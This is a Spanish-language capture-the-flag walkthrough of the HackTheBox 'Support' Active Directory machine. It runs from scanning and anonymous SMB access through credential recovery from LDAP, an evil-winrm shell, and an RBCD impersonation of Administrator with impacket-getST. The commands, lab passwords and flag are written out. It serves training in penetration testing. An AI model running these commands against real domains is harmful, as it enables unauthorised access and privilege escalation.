HackTheBox Support

❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.11.174 -oG port

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack ttl 127
88/tcp   open  kerberos-sec     syn-ack ttl 127
135/tcp  open  msrpc            syn-ack ttl 127
139/tcp  open  netbios-ssn      syn-ack ttl 127
389/tcp  open  ldap             syn-ack ttl 127
445/tcp  open  microsoft-ds     syn-ack ttl 127
464/tcp  open  kpasswd5         syn-ack ttl 127
593/tcp  open  http-rpc-epmap   syn-ack ttl 127
636/tcp  open  ldapssl          syn-ack ttl 127
3268/tcp open  globalcatLDAP    syn-ack ttl 127
3269/tcp open  globalcatLDAPssl syn-ack ttl 127

Puertos Abiertos.

# Nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269 -oN taregt.txt >
Nmap scan report for 10.10.11.174
Host is up (0.037s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-02 13:13:57Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: -7h50m53s
| smb2-time:
|   date: 2025-05-02T13:14:02
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May  2 17:05:33 2025 -- 1 IP address (1 host up) scanned in 50.11 seconds

Versiones y servicios que corren para cada uno de los puertos.

ldapsearch

❯ ldapsearch -x -H ldap://10.10.11.174 -s base | grep 'ServiceName'
ldapServiceName: support.htb:dc$@SUPPORT.HTB
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN

Comrpobamos el dominio y lo agregamos a nuestro etc/hosts.

smbclient

❯ smbclient -L //10.10.11.174/ -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	support-tools   Disk      support staff tools
	SYSVOL          Disk      Logon server share

Observamos los recursos compartidos.

❯ smbclient //10.10.11.174/support-tools -N
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

		4026367 blocks of size 4096. 970866 blocks available
smb: \> recurse ON 
smb: \> prompt OFF
smb: \> mget *

Nos conectamos al recurso compartido con una session nula y nos descargamos todo lo que encontramos.

❯ 7z x UserInfo.exe.zip

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 277499 bytes (271 KiB)

Extracting archive: UserInfo.exe.zip
--
Path = UserInfo.exe.zip
Type = zip
Physical Size = 277499

Everything is Ok

Files: 12
Size:       652675
Compressed: 277499
❯ ll
.rwxrwxr-x kali kali  12 KB Fri May 27 13:51:05 2022  UserInfo.exe

Nos descomprimimos el UserInfo y vamos a analizar el archivo UserInfo.

Binary Analysis

Vamos a usar un Windows propio para analizar, así que lo encendemos, nos conectamos a nuestro Windows local y transferimos los archivos a analizar y el DnsPy.

Comprobamos que al ir al siguiente paso en la variable password se almacena un valor que parece ser una contraseña sin encodear.

LDAP Enumeration

❯ ldapdomaindump -u 'support.htb\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 10.10.11.174 -o ldap
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
❯ cd ldap
❯ pwd
/home/kali/Desktop/HackTheBox/Support/content/ldap

Ahora vamos a observar la informacion abres el navegador y le pasas la ruta de donde almacenastes el dumpeo

El usuario actual que poseemos credenciales validas no pertenece al Remote Management Users asi que no podemos conectarnos solo el usario Support pertenece.

❯ ldapsearch -x -H ldap://10.10.11.174 -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" | grep 'info'
 y with information about license issuance, for the purpose of tracking and re
 298939 for more information.
info: Ironside47pleasure40Watchful

Parece una contraseña filtrada u otro tipo de información sensible asociada a algún objeto en Active Directory. Para averigurar a que usuario pertenece lo podemos hacer con NXC

NXC

❯ nxc smb 10.10.11.174 -u UserAd  -p Pass 2>/dev/null | grep -vE '[-]'
SMB                      10.10.11.174    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB                      10.10.11.174    445    DC               [+] support.htb\support:Ironside47pleasure40Watchful

OK la contraseña es valida para el usuario support recordemos que este usario forma parte del Remote Management Users, asi que si podemos conectanos a la maquina.

Evil-Winrm

❯ evil-winrm -i 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> cd ..//Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> more user.txt
6f1d193d0fed22a0c56bc47b6ded4f1f

*Evil-WinRM* PS C:\Users\support\Desktop>

Tenemos la primera bandera.

Bloodhound

❯ bloodhound-python -u 'support' -p 'Ironside47pleasure40Watchful' -c All --zip -ns 10.10.11.174 -d support.htb
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.support.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Management.support.htb
INFO: Querying computer: dc.support.htb
INFO: Done in 00M 08S
INFO: Compressing output into 20250502204714_bloodhound.zip

Ahora vamos a verlo mas grafico.

Privilege Escalation

Constrained Delegation to Gain Unauthorized Access

Evil-WinRM* PS C:\Users\support\Documents> net groups

Group Accounts for \\

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
*Shared Support Accounts
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\support\Documents>

Pertenecemos al grupo Shared Support Accounts.

Este grupo Shared Support Accounts tiene derechos sobre el DC.

Nos transferimos la herramientas que vamos a necesitar.

Este articulo lo explica como se explota y las herramientas que necesitaras.

❯ impacket-getST -spn cifs/dc.support.htb -impersonate Administrator -dc-ip 10.10.11.174 support.htb/FakeComputer$:Password123456 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache

❯ export KRB5CCNAME=Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache

El comando impacket-getST que estás usando está realizando un ataque Resource-Based Constrained Delegation (RBCD) para obtener acceso como Administrator en el controlador de dominio (DC).
El objetivo es suplantar al usuario "Administrator" frente a un servicio (en este caso, cifs, el servicio SMB del DC) usando una máquina falsa (FakeComputer) que tú controlas y a la que el DC ha sido engañado para confiarle ciertas delegaciones.
Es decir, el DC cree que FakeComputer está autorizado a hacerse pasar por cualquier usuario (como Administrator) al acceder a sus servicios, gracias a la configuración maliciosa que tú aplicaste con PowerView.

Maquina resuelta.

AnteriorHackTheBox Authority SiguienteHackTheBox Return

Última actualización hace 7 días